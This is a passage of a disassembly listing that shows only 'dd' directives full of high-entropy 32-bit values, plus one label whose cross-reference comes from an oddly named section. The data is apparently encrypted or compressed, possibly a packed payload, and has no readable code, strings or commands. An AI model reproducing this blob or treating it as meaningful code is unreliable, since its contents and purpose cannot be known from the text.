		dd 157BC125h, 0BE56D7AAh, 94774647h, 7511F6D4h,	0A971AFC3h
		dd 0A4BBAC91h, 62F8DFA7h, 16CA5949h, 0F2FDA032h, 0E292A34Ah
		dd 328D8013h, 0D5025A20h, 395A0725h, 5764515Fh,	0A83B071Fh
		dd 0DC4CF67Dh, 82543B06h, 54F75DD6h, 59B2858Ah,	9B2476C4h
		dd 0BB21BEA8h, 0A12BEE0Ah
		dd 0D3FD45A3h, 0CEB354B9h, 5E070DC4h, 0F27CB878h, 280D873Eh
		dd 0C8CFE82Fh, 4C2BA380h, 834EB36Eh, 0E343D416h, 4C5A1586h
		dd 0E6FDF451h, 49CF224Ah, 0B2574B46h, 0BDB98534h, 4BFEBDB2h
		dd 0AF44D768h, 6EAC6E3Dh, 35E69A1Dh, 1F52BD1Ah,	0F1623085h
		dd 0B5428D1Eh, 3EBCFF75h, 8E5FFDB0h, 5789D33Dh,	4767B186h
		dd 74E87A5Fh, 4656288Ch, 66961BFBh, 154A6CB1h, 0D4C2ADCEh
		dd 13A8D28Bh, 7A3A66D1h, 5E07AFC4h, 0F5FFF851h,	44B46F4Ah
		dd 0E82F155Ch, 7A9A637Ah, 5DAD0FF7h, 7BE9E657h,	0A21F155Ch
		dd 3700DDA7h, 0C28C8B97h, 0ED4A2AA1h, 5175A5A6h, 3E3B26D1h
		dd 0AF80F724h, 0FA81890Fh, 0AC5F5F93h, 6BEE575h, 3263150Fh
		dd 0AB07C2CFh, 5667AD15h, 18BBBA10h, 0B0CA157Fh, 3AD78523h
		dd 0B8CB9734h, 2AE22795h, 0DEAB5EDCh, 0F2831694h, 53E47A49h
		dd 5E55ABF9h, 1A82478Dh, 855B6001h, 16F6A392h, 0E716E83Fh
		dd 4C6486CFh, 575E3FDh,	467F28DCh, 38CBA23Bh, 49556C15h
		dd 9F03AB31h, 82C25D73h, 167D5657h, 0EBA8BF5Dh,	0D0A57718h
		dd 0F15AED85h, 6BD86252h, 88BA95FCh, 7D37CC16h,	23D98DFBh
		dd 55AA63FFh, 7F6AE2FBh, 0C426EABAh, 9C653AF9h,	947C52FFh
		dd 6D4F889Ah, 6415926Ch, 0E798B5B2h, 0A92439ECh, 674B2D01h
		dd 5F60721Bh, 5366D91Fh, 0B92C13Eh, 9C25555Ah, 0CCD555A0h
		dd 0B3AB15BAh, 2CFE52B4h, 3E40EE53h, 71B49932h,	0A7AB4D6Bh
		dd 814DAAD9h, 0A972C8B3h, 7DA3C2B8h, 123BDA6Dh,	270EBD5Dh
		dd 0A3767710h, 70FFCEDFh, 1AF1BDEBh, 6EDBBC0Fh,	7419B7E5h
		dd 159A416Ch, 0B0555F63h, 0BF2C0F3Ch, 62D3E8DDh, 37F78F15h
		dd 6358FFA2h, 910AF71Fh, 574EE6E5h, 1426D29Eh, 1D274BE8h
		dd 0DF234965h, 0BEC47C78h, 4FBF03CEh, 0B6D7FE7Dh, 379B0B71h
		dd 0F3FA5881h, 4C5DD6C0h, 37FF174Bh, 0AC91DB2Eh, 0F3E7BBB2h
		dd 0C6BB5026h, 6EC1E790h, 0B53F6BCDh, 0F92BA987h, 0A9D7735Ch
		dd 724EE8BEh, 0F40FB5ECh, 0DD5CBD25h, 0D87EB5B8h, 1B692A1Fh
		dd 0E75A0ACFh, 0B47C0194h, 4607C4AAh, 0D3659B19h, 7E9EDB12h
		dd 42837A6Ch, 0F7E5B7ECh, 8C54476Bh, 80E964CCh,	0B827FBDBh
		dd 0D638BCF8h, 0F22B2375h, 0FF668F0Eh, 1E4B2546h, 4D9DEEFCh
		dd 0B80A9325h, 0DC5F43F1h, 8CD18BD0h, 0DC3C0CEBh, 383B67EFh
		dd 0A05F3FE0h, 92AFF99Eh, 7899159Ch, 0B01A8B9Ah, 74929B2Ah
		dd 0B10794B1h, 0D19A6751h, 2EA5D638h, 0F937586Ah, 102FEE9Eh
		dd 0FC288A79h, 8853E78Fh, 73573207h, 516CBACFh,	0C411EE35h
		dd 0B4F86C7h, 5391F535h, 7F80305Fh, 89628BE5h, 0A821338Ah
		dd 5DAE328Bh, 3BF44481h, 0CC0B7AB1h, 60A91189h,	0D73C32E2h
		dd 665EB6E1h, 1733E349h, 87423EADh, 4FF37F43h, 174B3349h
		dd 0E52A6C78h, 0CBA5E863h, 0D9794736h, 0ADAF55Eh, 8F9A4C60h
		dd 0D231270Eh, 2E1F9FDDh, 5F5199F7h, 1FBF8CC7h,	9E22BF9Ch
		dd 7BD25CA7h, 0A38AD1E1h, 5DCDEE1Dh, 7D0F0D30h,	63DAA26Ch
		dd 49EEF196h, 262C76C6h, 8CDD9177h, 27987698h, 94B50214h
		dd 7FACF58Ch, 0C310E925h, 0CBFD0FBAh, 6D54FBD9h, 2CD0B234h
		dd 1A2B89A2h, 5EA5496Dh, 211F9DD7h, 43664C73h, 0BB5CDF93h
		dd 0F49D72A5h, 6594AFAFh, 5CB7DCB2h, 0B16854B4h, 65EE0D2Eh
		dd 2A10C04Ah, 0D218329Ah, 0BCA5AAEEh, 58C4D5E8h, 7CE934ABh
		dd 9B10E1E7h, 919ACA02h, 0A555FE0Fh, 0E8527BC7h, 9309F640h
		dd 6D670778h, 12EE69B3h, 0BAD4D6BDh, 0B83B4768h, 0EBA0A515h
		dd 0E8785969h, 5D74DFDDh, 296090C3h, 0DABCD1B0h, 188D5435h
		dd 0DC5372Fh, 1FF50CAAh, 6D6843E7h, 0D8CBBB3Eh,	6B82CA40h
		dd 33F86EF4h, 0B2E55EC3h, 0DD49F0F4h, 0A73F453Ch, 4CA9FED2h
		dd 568B245h, 0E87A2E96h, 72A7C83Ah, 0E032A2EDh,	4ED931D2h
		dd 1BF3A5Ch, 6E07DD65h,	29CEBE8Eh, 0F8F2C339h, 8A82E814h
		dd 22BF3058h, 4739BE36h, 5EEE3C95h, 3C9D68F2h, 66928BADh
		dd 1BCBBA36h, 0A2E15F91h, 43FA4EFBh, 0F1F5E925h, 0A8D17F20h
		dd 0CDBD52C5h, 616C4469h, 0A59DA0D3h, 0CDED6629h, 77DE416Ch
		dd 0B506EE75h, 7D3D42ACh, 4673B51Bh, 70AB8307h,	8D313EC3h
		dd 212DBB85h, 0C92E5F68h, 573D1449h, 97FA257Eh,	0B439708Bh
		dd 0EDE2D93Bh, 263663C7h, 2A31CD0Bh, 0A63744E3h, 0C5F52A71h
		dd 1F994AADh, 0F2DBA463h, 920F5FC2h, 84E776D6h,	6DD577DEh
		dd 0A249906Bh, 1AE9EF6Ah, 5C64993Fh, 0C77960A1h, 65196344h
		dd 9FE96885h, 5DDB266Fh, 6BCEB6B4h, 1610D967h, 823FA9C6h
		dd 0D0FC8985h, 44409566h, 0FA6C57F7h, 0CB8FC0BCh, 468D455Dh
		dd 3A5922D9h, 0D3FF655Dh, 0FB8A74ACh, 6FD49FD8h, 0FFBFBEE7h
		dd 15E51571h, 2CF733C0h, 1D496A78h, 0D1A090FCh,	413CD66Ch
		dd 5F18D15Fh, 0BEC58FDDh, 0C93CB2C5h, 2F917ECh,	5C1D9F0Bh
		dd 0F48E93DFh, 9C82A26Ah, 1C15D846h, 422C3A29h,	968673A5h
		dd 0AABF84A7h, 2B196EEh, 0FB2D98CCh, 0B32BA8E3h, 0F5F4EDECh
		dd 11AC3EACh, 644184B2h, 0ABA85AB9h, 2C6B6395h,	3CA30859h
		dd 859559A9h, 0CC07B2BCh, 0CF055C42h, 570CE2E6h, 0B6376DD5h
		dd 0C5FEAB4Ah, 9E53F70Fh, 0FB4CBE6Ah, 0F7033EF7h, 74F26A1h
		dd 6FDE8583h, 58852C84h, 14FAB9ACh, 557CB2CAh, 32A97EA9h
		dd 1F56B9CFh, 7D95459Dh, 368B07E5h, 0A726CDE0h,	0AA4E2E21h
		dd 492ED655h, 0ADDEBE16h, 7EFABBAEh, 186B9561h,	0C75FD5EDh
		dd 1B2A94C7h, 34775751h, 0B4C41932h, 0ECB0C36h,	587CDCBAh
		dd 5EF87769h, 0D7F56CCAh, 6DE75BE7h, 23DFAABBh,	530F62E5h
		dd 4AA64442h, 28C4906Eh, 0FCCFD3D2h, 1904B7F0h,	3751079Fh
		dd 2A52897Fh, 0AC3A5379h, 565F0BDBh, 0A51BC961h, 0B2FD07BAh
		dd 8DF5C0F0h, 28DACD0Eh, 0B78C16ADh, 41683B47h,	0BB11CAC3h
		dd 4ECEF8BFh, 41F6A1D6h, 6057769Ah, 8D4DC34h, 0C234A51Bh
		dd 278AADD5h, 154EAD14h, 0BC007AEDh, 8BB759B4h,	50B4BCFDh
		dd 0CD1006E5h, 798158BCh, 0F55936E2h, 0F976F19Fh, 1630FA45h
		dd 5BB32CBFh, 0A844D2B9h, 0E90149E9h, 16203E8Bh, 0BF891FEEh
		dd 8286E7F6h, 7D61C6E0h, 4EEC799Bh, 0C7F67DABh,	25242394h
		dd 77F477D4h, 0C80AB42Eh, 0F03D555Dh, 7B3BEB64h, 0F541EDAEh
		dd 0FF40B87Ah, 0DFD3D29Ch, 0AFBD6AFDh, 75A1EB65h, 192AE064h
		dd 9122447Ch, 42D19551h, 0E065E7D7h, 747332A5h,	7DEDEE07h
		dd 0DB6ACA73h, 9CACC6D9h, 2E323C7Ah, 55360DD9h,	0C7A954F5h
		dd 5BE70B12h, 0AD78E05Fh, 0CD156B0Ch, 0B8960249h, 127765C3h
		dd 3AEC8694h, 0A5ABDEAFh, 387E3C62h, 0FAA26F72h, 627E8E17h
		dd 9353A148h, 5805BABAh, 0C1A74C29h, 7B519BFBh,	6073B46Bh
		dd 6C92DF18h, 5305A365h, 0B411957Ch, 6CE4D87Dh,	0CEED1636h
		dd 0CD8B612Dh, 8AC56FFAh, 0A8CBB65Eh, 30F5FA63h, 4E8D53DDh
		dd 4B13CC7Dh, 386BC5E2h, 0E5FD55FEh, 0C67D37FBh, 271965D0h
		dd 0B3F8F04Ah, 88D1FAB7h, 4494487Fh, 0EFFB3A43h, 3E151703h
		dd 0EF417FB3h, 0FB57F665h, 0D36C4C8Eh, 6C46F7B6h, 9933EB88h
		dd 0DF68F2F4h, 0B006969Ah, 0D8476660h, 0A21D113Bh, 0F4155ACh
		dd 0D04EE855h, 0C31D9E72h, 0F0DF98CAh, 0A9FBCBC3h, 23E42A72h
		dd 0A6DDD4DBh, 0C01D6F5Fh, 74C8FB3Bh, 0B6061D64h, 3FB144A9h
		dd 0EC34C4Eh, 6755D10Ch, 93382D37h, 0EF6387CAh,	0C5135466h
		dd 94DA50A7h, 0BE64FD6Ch, 712F35F0h, 6E3569E0h,	4780107Dh
		dd 0B7D58FC3h, 0BB58A328h, 0F6548CE3h, 2C572932h, 0D0BFF03Dh
		dd 0E29F58C5h, 269D579Dh
		dd 7952E5C1h, 0A9DA6E74h, 0FB8D67C0h, 0B53C26B9h, 0D789E1D1h
		dd 0B9F03978h, 5E8FA1C3h, 0A24CF3F5h, 5275A8BDh, 0AA52EE98h
		dd 89AB268Ah, 0B93649AFh, 3BEFDC5Ch, 0CCECA60Ah, 9D3557E4h
		dd 51B6D5A2h, 4940A863h, 0D34BBBFAh, 0CFE3EA30h, 0DFB94C84h
		dd 14295E09h, 0E034DCE3h, 0C1861B87h, 0B68F9817h, 5BDCF3F2h
		dd 0DEAB4D54h, 2413B507h, 0D3388B33h, 89549AABh, 6755C661h
		dd 91DF95EAh, 7C70DCB1h, 90C4061Ch, 0ABA291FFh,	0EE68041Fh
		dd 3CB8C677h, 4FE35770h, 657117CAh, 7A07CE62h, 81FC3797h
		dd 9CFB8D37h, 0FDB3D0FDh, 0E3E603C3h, 55F108CAh, 0B788D0DAh
		dd 99A3A030h, 62ECDF0Dh, 0AF38EF25h, 0CE5AD4CFh, 3D793060h
		dd 0ADA53092h, 0ED62F685h, 50BACA7Dh, 5A5D5495h, 764EAAE3h
		dd 3F4AEDD5h, 1F2A8E44h, 905FED5Eh, 9E6116CAh, 0AB94CF29h
		dd 35ADE88Ch, 0C8FF5FF3h, 0EF34CF8Dh, 0CA82781Fh, 58EBAFBDh
		dd 89BEC756h, 0E0A6A234h, 1FD4918Fh, 19532509h,	64B4FF46h
		dd 0B8B9ECBFh, 551A67A9h, 450EFAA1h, 847685A2h,	0B996EB33h
		dd 5EC12419h, 0ADC13143h, 0E42F62EEh, 0D6BAD9FAh, 459AF06Fh
		dd 0D60BB23Ah, 28FE203Ch, 0DF75D13Dh, 3B5C6434h, 0BDACD3A0h
		dd 956EC574h, 3244FA90h, 2947FDA8h, 0EFC69DDBh,	8A15C318h
		dd 3A61E10Bh, 9526C686h, 0F15F662Eh, 0E17EC197h, 0A1150A8Dh
		dd 32DF1706h, 4D09FDAh,	0C2D9850Ch, 0F48E548Dh,	0A767881Eh
		dd 0DE7D7EE7h, 8749BC31h, 450226B5h, 959C0ACDh,	0BD72D3EDh
		dd 8756E250h, 7402E41Fh, 8E2AA965h, 0CAD7CB47h,	897F1B7Dh
		dd 1BCC0EBBh, 0C5310CA2h, 0E04B9DAAh, 5822AADEh, 7AA7F872h
		dd 68A26AFEh, 45717CFh,	581C077h, 7FFB23C2h, 0BF2AF967h
		dd 735B1E6Ah, 40F367ABh, 8FAA97EAh, 3A027B37h, 3AC66296h
		dd 0EC527391h, 0F4796D78h, 0D7CBD34Fh, 5DEBBC2Ah, 3E2180C4h
		dd 57AB0B19h, 1BF419A5h, 600A8A79h, 638C311Ch, 0EE84F716h
		dd 0C1E75636h, 6BA22F8Dh, 0AA6546B1h, 5A9B4234h, 0C4AB1CDEh
		dd 0BF296364h, 1703C31Fh, 161EBA7Bh, 1EECFBF6h,	3CDD67D4h
		dd 3B0792A4h, 0B5286C9Bh, 4527DFC2h, 3E0F280Fh,	882E381Eh
		dd 4D945996h, 5A7F3B11h, 51B7A68Fh, 837B3F1Bh, 629626Ch
		dd 3F676E7Fh, 15F7CCDBh, 0A4636A47h, 0BD2F3823h, 9907A31Eh
		dd 4FD5EDD6h, 0CC591122h, 47D3417Ch, 2B4ADADBh,	0B9285B45h
		dd 2C319A38h, 68549149h, 0FC1DA2Ah, 66570EB5h, 82D7D671h
		dd 5D50C359h, 0E4D4F990h, 0F6B7BACEh, 46C41C31h, 0FC597254h
		dd 0BB898DCAh, 7564907Dh, 207CA54Dh, 7121655h, 5B50905Dh
		dd 0F1EB8125h, 13796C0Bh, 0C80661B9h, 95CB02BAh, 1EFF715Eh
		dd 0DC59DF98h, 0F89C52B5h, 88EFE9ECh, 968A421Fh, 0A3E5A9C1h
		dd 0BB0B26DEh, 5C39705Fh, 57A9F9A2h, 8B9870E0h,	0F06A015Fh
		dd 1E67EEFDh, 43E7C6Eh,	3F10729h, 0F1BED7F7h, 0EA53F9E3h
		dd 4451F7BBh, 0EE1850F1h, 682096Dh, 3E7C7760h, 3C0D599Fh
		dd 0A7CCB44Fh, 6EA2E1A5h, 0BC72D332h, 0C609A972h, 32D6BEEBh
		dd 7D83FDFBh, 3BED7461h, 3B88BFACh, 9CC95F19h, 3DAE41E5h
		dd 108D92CBh, 6C185A96h, 1C3FC68Fh, 0FB2E550Fh,	0EE1B010Bh
		dd 8BEB7115h, 0DAA34D7Ch, 8772C25h, 15753FB9h, 47720791h
		dd 35537836h, 1C9262C3h, 1BB44EEEh, 0DC41CFA5h,	93864FD7h
		dd 45562B24h, 0B577CAE8h, 133E0D12h, 0F68B2627h, 0BD567FF9h
		dd 0C80ADBB4h, 8BABD4BBh, 0C69AD356h, 0F1D3E5ADh, 3B0A9F43h
		dd 636CC5F7h, 0EE9FA9DBh, 9CC7EAD0h, 4EE565D9h,	441F50A3h
		dd 0B241AD2Bh, 70E718AEh, 5D496F71h, 0F3560E84h, 0A5269795h
		dd 4AA54B02h, 951D7497h, 0F7E23178h, 3D49DEB6h,	43696B82h
		dd 62A5D1BAh, 0FDB9A84h, 0B0C8B5ECh, 0B83A6B99h, 85314BF1h
		dd 0C16CE95Ah, 3694BE9Bh, 520CC10Bh, 656707A5h,	895D6512h
		dd 131965C4h, 0B7E08483h, 4DEF6D5Ah, 338E7C7Ah,	1FEA3A41h
		dd 7B5E9EC0h, 0DE074EBDh, 53357D4h, 2AC7E6CDh, 280D62B5h
		dd 5F8F3EF7h, 0F2FF2B72h, 0B1FECC5h, 0F7CE168Eh, 0EB55B99Bh
		dd 7AA7DE5Bh, 0BC67BD60h, 39F9DF11h, 558F1A11h,	654B0A5Ch
		dd 5FF17AF3h, 0CF92C1B1h, 8ED0E245h, 22D48B28h,	9F5BABA8h
		dd 0AA5EEB2Bh, 0CB6845ECh, 211417D5h, 0B6D89454h, 5E0CC7BEh
		dd 0D7727B1Dh, 0D6F460B1h, 4FF27A3Eh, 581AEFB4h, 0BC69A523h
		dd 9393163Eh, 0F2BD1FCDh, 0DAEC1E75h, 3CC73F3Dh, 0F14B04D8h
		dd 6E2DFD01h, 0FF92A0C2h, 931F329Ch, 971B1D0h, 7470531Dh
		dd 5F0FC0F6h, 74B8BE06h, 0E9B13EB4h, 39CE4A50h,	0EC2D3153h
		dd 2CCD3B4Fh, 0C7793D15h, 0C6704228h, 7CFA69BCh, 0A2C7E5F9h
		dd 0D3ECCDAEh, 2580497Bh, 80FEA8E1h, 1F476BAEh,	0DD7808F8h
		dd 0FBA9FA0h, 0FDF659BEh, 7BF82181h, 632CE5B1h,	0FFF720FCh
		dd 0ADC44012h, 34B63354h, 0E6F00E56h, 929EB133h, 0BE7B7871h
		dd 5F2FA8EAh, 744E4149h, 0F287DB5Bh, 55879231h,	0E0ACE0A0h
		dd 134515E3h, 4477F163h, 6703F993h, 0A218622h, 6FB477D3h
		dd 7DF37F40h, 51845E89h, 3585AECBh, 76D8C1FCh, 7E24F947h
		dd 86649A0Bh, 759BBE93h, 0DE7B6939h, 3977464Bh,	0C34B26C7h
		dd 2D98E987h, 0A8E753EDh, 0B99D0CC2h, 3CC5B829h, 1D2D5E26h
		dd 24FF0916h, 4CF67299h, 3811CDBEh, 5D034591h, 0FADEB292h
		dd 0C290544Dh, 0C2AD00ADh, 0AFE4D341h, 4DED7F8Ch, 9999E4CEh
		dd 4E4E2BA3h, 40C91357h, 2B5B93AAh, 734576A1h, 0CAAAF1CAh
		dd 0CEE486BFh, 0ADACC1E9h, 5CDCD7A8h, 881C5D65h
dword_484560	dd 1E98097Fh, 0F5CE78EDh, 0B434D6Ah, 1B5FD1C8h,	0A95704FBh
					; DATA XREF: jlrllt49:off_41F864o
		dd 0DDD4CFBCh, 0E979A776h, 0D2DE7540h, 6A296CBEh, 0B8EDEA3Ch
		dd 0DAEB722Bh, 474EE652h, 9687A7ADh, 32186079h,	0B4F3D932h
		dd 70FC7ECAh, 96BB4E61h, 0EFDD55C2h, 41B530A8h,	8CFCDECEh
		dd 0AE2F4E1Fh, 0F023FC83h, 9F5B74E0h, 13CD5337h, 889213DCh
		dd 581E12AAh, 93E65E24h, 6D31F5BFh, 0A40BDE85h,	415BF3ECh
		dd 23EC65E7h, 77BE3366h, 0F398BC91h, 7AFD66A4h,	0B500924Ch
		dd 0B2CB3F12h, 0ED261B2Eh, 7C956179h, 0CE6910B5h, 0D0BEDBC1h
		dd 0E6AC78BAh, 953D72C2h, 0C8F1594Bh, 29764854h, 53A129A3h
		dd 56F65F97h, 5C273994h, 58496DC8h, 86D7D336h, 328061D4h
		dd 0C82F6561h, 7CEDF19Eh, 0A5E200F6h, 350D2DD7h, 0ECC04A3Eh
		dd 550402B4h, 0D696B132h, 348818F5h, 7F87FC59h,	32040E70h
		dd 42761932h, 28F1AB8Ch, 0AF3F15CEh, 2B52EAD2h,	8A5A5489h
		dd 738110A6h, 8D78B566h, 78F5E9CCh, 0D5CAE7EAh,	11693D58h
		dd 0F65AA785h, 7F67714Fh, 7D2093E8h, 1AD67109h,	944FA2A9h
		dd 1702B740h, 923739CCh, 298CA38h, 0BEFB5675h, 5F0153D8h
		dd 7FC6C700h, 3499875Ch, 99F2540Fh, 781F13FDh, 8D14E2FFh
		dd 0E1965CDEh, 67C0C897h, 0D4F5A743h, 6E7961DCh, 62EFBEA8h
		dd 2CF97928h, 4391DDD3h, 65739167h, 972CAFA3h, 0E57BDBAFh
		dd 1E4105D0h, 0C1F0E13Fh, 4C48B1ECh, 196EF376h,	50D5FE73h
		dd 0F89854E8h, 21CE43B0h, 3DC556FCh, 0ADDD352Ah, 451CA8AAh
		dd 3A55F63Ah, 9E627A5Ch, 0A90B1EFFh, 0AAD6976Fh, 0D157567h
		dd 4EE42A80h, 8D0C9681h, 0A57DDF07h, 52CA89FEh,	0B7EDD2F8h
		dd 7311AF14h, 0BDA7101Fh, 0C961E4BAh, 0D2ED7D07h, 8E47CACAh
		dd 10141EF8h, 4B06FAB2h, 1953FACFh, 0FC3CE2A3h,	0C7E8E590h
		dd 6458AF5Eh, 69667FCAh, 94B0AF38h, 0B22866D1h,	9002ED1Eh
		dd 41BB245Dh, 8DE4911Ah, 0B50773F1h, 0D6E72E0Dh, 65573C8Dh
		dd 175C1BC0h, 0F67DCAC5h, 498F09C8h, 2D469FF2h,	0B89E8235h
		dd 30A9F18Ah, 678233EFh, 7A3D68A2h, 0C96B8F07h,	2D91DA96h
		dd 0D8483390h, 5B135D17h, 0B8E94B47h, 50201AD7h, 0A2EE5DECh
		dd 4519C4D4h, 0BE2E53C8h, 18DD59C1h, 0B4B8A800h, 8A781B72h
		dd 0CA310F73h, 0A684C519h, 85C1B8FFh, 7AFCCC16h, 0C66C64F3h
		dd 5E6B4EE5h, 0F71321B2h, 7DF827A7h, 5AB492B4h,	81F30FF8h
		dd 57CC43DDh, 27EB5669h, 0D1979329h, 0BD2CEDAAh, 68EEFF40h
		dd 2C65BF96h, 614021D9h, 0DD85D0A3h, 0F4C082DAh, 0CB843466h
		dd 0D77FFEF9h, 5B4150E2h, 1C6D207Dh, 0E07EE823h, 479A1384h
		dd 0C7623B0Dh, 0EA0DDEA6h, 310677DEh, 0F55EA2A7h, 2BA23ADBh
		dd 666550FFh, 0B7B849Bh, 0AFF68D1Eh, 6F40ED7Dh,	6B597DC7h
		dd 0F9C981DBh, 0E69BDE22h, 10DB56F9h, 303E3332h, 3E4D9858h
		dd 6FAE2D46h, 1D4BEC58h, 0ADD68EBBh, 0D2EE128Bh, 58145F0Dh
		dd 1D4A9E9Bh, 0C08984EEh, 23F7D1B9h, 0A60DD1BAh, 5E18B253h
		dd 0C18B2A37h, 62707301h, 0D6C63530h, 0C6E345D5h, 3E72D960h
		dd 0D1AC3AF8h, 0C8CDA705h, 0EA8A4B6Eh, 237A2A58h, 0D0D4BB49h
		dd 0B9B8165Eh, 562655EDh, 0A9B73359h, 9B0988A5h, 46A9E48Dh
		dd 60E9EDFBh, 71EDE74h,	0D9426B18h, 5BFB8BB9h, 0FA0B9CC0h
		dd 71D3BA9Dh, 0B78F676Bh, 28FB6EFDh, 3E0B9AF1h,	2B3B03C6h
		dd 4F76F5EAh, 0A2C4978Ah, 1BE5573Ah, 53E8AC34h,	0BC9EFC36h
		dd 0D376DC35h, 9443BD1Fh, 7DEAD8E8h, 0C4960257h, 75E0F9ECh
		dd 5A2FA9B2h, 62D696CEh, 0FA50564Eh, 82FFF9C2h,	0B60A0BDh
		dd 2D74291Eh, 0E585D7F5h, 4355D40Fh, 0CD91AC1h,	0E2DDF167h
		dd 6DDCCBA8h, 5199AACh,	2A2F7FCEh, 3CF2D6B7h, 81568838h
		dd 3192EEBCh, 3B989373h, 98196EF9h, 9166C75Eh, 0AFE55545h
		dd 0BF4024CBh, 71391B6Eh, 21F815DDh, 0C5B58AD4h, 45D1DCC4h
		dd 85FC6391h, 0B5DBF53Eh, 0E1CF195Ch, 7C2C2E5Fh, 2BA4A1DBh
		dd 0DC0DD917h, 0CA4ED97Ch, 0D940F384h, 4F20F40Dh, 0AA3C2A4Bh
		dd 5F6D7753h, 0D1EEDD4Ah, 71728B40h, 0DE25C7A7h, 723FC2F9h
		dd 2F23C9FFh, 0C0B8B35Bh, 0D7A6AF9Fh, 0A4C870B6h, 1457D334h
		dd 0B03B5774h, 7D5573E7h, 83635AADh, 24DC8D74h,	0BE21D9B1h
		dd 872B640Fh, 0F57B3742h, 7C332981h, 82972514h,	99231946h
		dd 1F5EF35Fh, 0FC45CEF0h, 6172F5F0h, 5197A73Eh,	0CD65A1C2h
		dd 13F14C46h, 0E426B03Fh, 0AC7662CAh, 40D366F7h, 0CCA99E3Ah
		dd 0AEEBE4E0h, 37C896E9h, 696A7094h, 781FF1Ah, 7EBB981h
		dd 0EEC9DFC6h, 0A106B97Ch, 87FED7C9h, 0C4B853B1h, 0EB5BAF96h
		dd 0A60DAAD7h, 0CF163784h, 47FC1C26h, 0ED105C34h, 7D1438FFh
		dd 0E91EF384h, 0CBFB39D0h, 4F499EF2h, 50DDA3FCh, 0E6BE1E36h
		dd 8A1A0073h, 0DA428653h, 9FECEED7h, 8EE35576h,	1D7E46C2h
		dd 0D7C5F070h, 89566DABh, 9E119C92h, 0D8CAB1EDh, 7DA0A504h
		dd 7CB2B201h, 4569205Dh, 0EC9DB172h, 0D754CAF7h, 7E30C015h
		dd 8BE712B2h, 5CAAA115h, 47000386h, 5FE78344h, 4E716FE4h
		dd 0AB8DCC9Dh, 0AACB7033h, 0B4AD1B62h, 53F3A9ABh, 8E2EF685h
		dd 85094255h, 0A9805585h, 55D693Fh, 0CBFD4AD7h,	185B568Bh
		dd 8A110E78h, 0D9357D3Bh, 9C9C77A0h, 8AA6ACB3h,	8F5F8F18h
		dd 8298D4D7h, 0E86A0E1Fh, 0C5CEF357h, 6EDF8193h, 659DB03Fh
		dd 432A7A04h, 0CDB7731Bh, 4544EE3Ch, 9831B5B6h,	12C7D6Bh
		dd 0D991BD5Dh, 0DF45FAF1h, 48F8BB8Bh, 53A12696h, 0B14CBC1Eh
		dd 4FD60B4Eh, 0D011E29Bh, 0ECFD7F9Ch, 9AF51363h, 62A1D6B3h
		dd 77DBD593h, 3F16193Ch, 0D10396CDh, 2D543636h,	0D3FB5AB9h
		dd 73FCC6A0h, 0A555ED75h, 966B4E06h, 2BE9ABB4h,	8835ED14h
		dd 43F14A6Ah, 0F329CBAEh, 0A51C91DBh, 0AD789298h, 0D928D335h
		dd 0BD02FB48h, 8C5D69CDh, 98A20CAAh, 2C7EFC02h,	9283F766h
		dd 0F0A25598h, 0EE68AE11h, 0A5D4646Fh, 98461DB8h, 220AED14h
		dd 0EFC45976h, 591D8F65h, 2A6A7560h, 0E7F0A7CBh, 94851F8Ah
		dd 607A4C3Bh, 6EE7FBEh,	936354CFh, 0B85A6B1h, 5566784Ah
		dd 6AB80C08h, 827B31EDh, 0F23326A4h, 0D7DF81E8h, 0D9DE30BAh
		dd 8BA88BB6h, 3FAB1B84h, 0D2359E90h, 5329B252h,	924FDDB5h
		dd 15CD3854h, 28CF74ABh, 0A5A3577Ah, 875D17D5h,	948E2BBAh
		dd 2CEF17B6h, 0E2172B32h, 177256F6h, 0DFDAEE55h, 4EECA934h
		dd 0BFF1394Bh, 0F960C6E8h, 0D47668CAh, 0D6AAE12Eh, 0CCBA0FFh
		dd 9C859FEDh, 278F16AFh, 0B45C0970h, 335A5F71h,	85DE3D9h
		dd 516B1F4Eh, 8EA8E770h, 17A9BCAFh, 785043Ch, 0D26C8895h
		dd 0C97E81F5h, 73E8704Bh, 0E43A5F06h, 12E0E07Ch, 0FC870BEDh
		dd 0C8220913h, 8F39C362h, 41014799h, 8BBE96E5h,	9064AA36h
		dd 9E6AD9F5h, 0ED6FD1B4h, 531F5DDEh, 851403B9h,	54EF7BF3h
		dd 6498AA22h, 825ADCBEh, 68F7BFA7h, 563124B9h, 0E02925E2h
		dd 488A8987h, 90DC7855h, 16788B4Eh, 0BC0A6AF6h,	0B455DC0Dh
		dd 0A905BF46h, 3A3E3299h, 2DAC6C7Ch, 0AD687A0Dh, 0D126C36Bh
		dd 0F97E34F1h, 85107B4Ch, 1B9D1CD7h, 2605F732h,	568C8A4Bh
		dd 4863BA5Dh, 0FC66B102h, 0A845C97h, 22714334h,	79383C96h
		dd 537CD652h, 5246C7FBh, 7654AC19h, 0FB61A878h,	0B1BA08CDh
		dd 394AD24Ah, 0C1D0C095h, 0AA9FB52Ch, 4F13ED0Ah, 0B5178304h
		dd 0B297C150h, 0B9B57752h, 0F210F33Ch, 0C62CA81Bh, 3CBBD65Ah
		dd 31938DA3h, 0FB1C4329h, 0F019492h, 0A6B4B85Ah, 0D67487E0h
		dd 0CC62C5ADh, 1AD65A49h
		dd 1E1E3EA9h, 29AACA06h, 13820EB7h, 953AAB40h, 81F4CD97h
		dd 3AEE9665h, 0DF9D57F7h, 2DF8942Dh, 7E4FD3C3h,	855D6925h
		dd 0B68DE39Fh, 4B911F83h, 787E8429h, 0BC652CB2h, 42293BECh
		dd 14890EBEh, 2E1C6A5Ah, 0C14A7B23h, 0B55AA6B3h, 2CAD4B4Dh
		dd 540A018Dh, 3AE15CB7h, 0C0CBF1DDh, 0B7398C62h, 3F03919Ah
		dd 0DF3B6F36h, 3CA2D6D3h, 0E1135F0Ch, 9E28A0C9h, 7CBBD1BAh
		dd 55CC5D01h, 89B52922h, 0C947D2AEh, 0E88168A2h, 2BBF1EABh
		dd 6616F06Bh, 21392956h, 4FA1B8A1h, 286C185Ah, 0F838557Eh
		dd 4E694161h, 35A782AFh, 3B4A0758h, 0AC4454A6h,	316D65FDh
		dd 7993D8F8h, 957CD756h, 0C2FF35E4h, 0F2E4D552h, 34C40537h
		dd 0C93CEAD6h, 401585A5h, 424EC0D7h, 4ADB700Bh,	6A9A932Dh
		dd 6CA005E7h, 0AFAD74Ah, 2BC932BEh, 0F8C2D99Ah,	0A24A8521h
		dd 999ECD33h, 2EAB2E95h, 45876546h, 57E23B22h, 71CB550Fh
		dd 4DB6C9B8h, 783CCE19h, 0FE3C8FD7h, 44B4D829h,	0CDB57AF9h
